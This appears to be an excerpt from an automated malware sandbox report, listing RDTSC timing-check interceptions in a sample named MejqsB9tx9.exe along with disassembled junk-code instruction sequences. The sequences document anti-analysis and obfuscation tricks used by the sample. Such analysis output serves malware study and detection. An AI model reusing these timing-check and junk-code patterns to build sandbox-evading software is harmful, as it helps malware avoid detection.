Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E8D7B1 second address: E8D7C4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB16D386888h 0x00000008 pushad 0x00000009 js 00007FB16D386886h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E8D7C4 second address: E8D7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FB16CB2DB76h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007FB16CB2DB7Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E8D7E6 second address: E8D7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a je 00007FB16D386886h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC454 second address: EDC45E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC45E second address: EDC462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC58D second address: EDC5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FB16CB2DB8Ah 0x0000000d jmp 00007FB16CB2DB84h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC708 second address: EDC719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D38688Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC719 second address: EDC72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB16CB2DB80h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC72F second address: EDC737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC737 second address: EDC73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC73B second address: EDC746 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC8E6 second address: EDC8EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDC8EA second address: EDC8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB16D386886h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDCBC0 second address: EDCBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDCBC4 second address: EDCBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FB16D386886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDCD65 second address: EDCD78 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB16CB2DB7Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDCD78 second address: EDCD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB16D386890h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EDCD93 second address: EDCD9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E65656 second address: E6565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E6565C second address: E65664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E65664 second address: E65669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E65669 second address: E6568C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB16CB2DB78h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB16CB2DB87h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE17F0 second address: EE180C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB16D38688Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FB16D386888h 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE195A second address: EE1970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16CB2DB82h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE1970 second address: EE197E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB16D386886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE197E second address: EE19A6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB16CB2DB76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jns 00007FB16CB2DB76h 0x00000013 jmp 00007FB16CB2DB7Ch 0x00000018 pop edx 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE19A6 second address: EE19B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB16D38688Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE1C56 second address: EE1C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE1C61 second address: EE1C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE1C67 second address: EE1C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE1C6D second address: EE1C72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE1C72 second address: EE1C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB16CB2DB76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE1FBD second address: EE1FE3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB16D386888h 0x00000008 pushad 0x00000009 jmp 00007FB16D386899h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE7027 second address: EE7045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16CB2DB7Ah 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FB16CB2DB7Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE75AB second address: EE75C9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB16D3868A0h 0x00000008 jmp 00007FB16D386894h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE75C9 second address: EE75D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FB16CB2DB76h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE75D7 second address: EE75DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE7750 second address: EE7771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16CB2DB7Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB16CB2DB7Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE7771 second address: EE7793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB16D386895h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE6DAB second address: EE6DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE6DB5 second address: EE6DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB16D386886h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE6DC1 second address: EE6DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE6DC7 second address: EE6DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE800E second address: EE8046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16CB2DB81h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB16CB2DB7Dh 0x00000011 jmp 00007FB16CB2DB83h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE8046 second address: EE804A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE804A second address: EE807A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB16CB2DB76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ebx 0x00000010 jns 00007FB16CB2DB88h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE807A second address: EE8080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE8080 second address: EE8090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007FB16CB2DB76h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EE8090 second address: EE8095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: E6DA46 second address: E6DA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 jno 00007FB16CB2DB76h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EEF70E second address: EEF714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EEF714 second address: EEF71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EF5352 second address: EF536B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d je 00007FB16D386886h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EF536B second address: EF5370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EF5370 second address: EF538C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16D386896h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFB14A second address: EFB15C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB16CB2DB7Bh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EF9A33 second address: EF9A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EF9A38 second address: EF9A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EF9E71 second address: EF9E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EF9E75 second address: EF9E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EF9FD8 second address: EF9FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EF9FDD second address: EF9FE7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB16CB2DB90h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFA121 second address: EFA125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAEDFC second address: EAEE1E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+122D3855h] 0x0000000e mov dword ptr [ebp+1246BBC6h], eax 0x00000014 push 00000004h 0x00000016 or cx, B027h 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAEE1E second address: EAEE24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAEE24 second address: EAEE3D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB16CB2DB7Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EAEE3D second address: EAEE48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB16D386886h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFA279 second address: EFA27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFA27D second address: EFA287 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB16D386886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE15D second address: EFE16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16CB2DB7Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE16B second address: EFE178 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB16D386886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE2D0 second address: EFE2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE447 second address: EFE44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE44B second address: EFE468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB16CB2DB87h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE468 second address: EFE485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB16D386896h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE611 second address: EFE615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE615 second address: EFE619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE619 second address: EFE61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE782 second address: EFE798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB16C743A51h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE798 second address: EFE7BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB16D3ACA56h 0x00000009 jmp 00007FB16D3ACA4Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE7BE second address: EFE7C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE7C7 second address: EFE81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FB16D3ACA5Eh 0x00000010 jmp 00007FB16D3ACA58h 0x00000015 js 00007FB16D3ACA4Ch 0x0000001b jp 00007FB16D3ACA46h 0x00000021 jmp 00007FB16D3ACA4Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007FB16D3ACA4Fh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE98D second address: EFE991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: EFE991 second address: EFE9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 jc 00007FB16D3ACA50h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F05BF0 second address: F05BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F05D40 second address: F05D6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FB16D3ACA59h 0x0000000c pop eax 0x0000000d jnp 00007FB16D3ACA52h 0x00000013 js 00007FB16D3ACA46h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F06094 second address: F060A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FB16C743A4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0636C second address: F06372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F06E30 second address: F06E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FB16C743A58h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F07108 second address: F0714F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FB16D3ACA52h 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007FB16D3ACA52h 0x00000012 pushad 0x00000013 jmp 00007FB16D3ACA4Ah 0x00000018 jmp 00007FB16D3ACA4Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F07716 second address: F0771A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0771A second address: F07722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0AD09 second address: F0AD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MejqsB9tx9.exe RDTSC instruction interceptor: First address: F0AD0D second address: F0AD11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
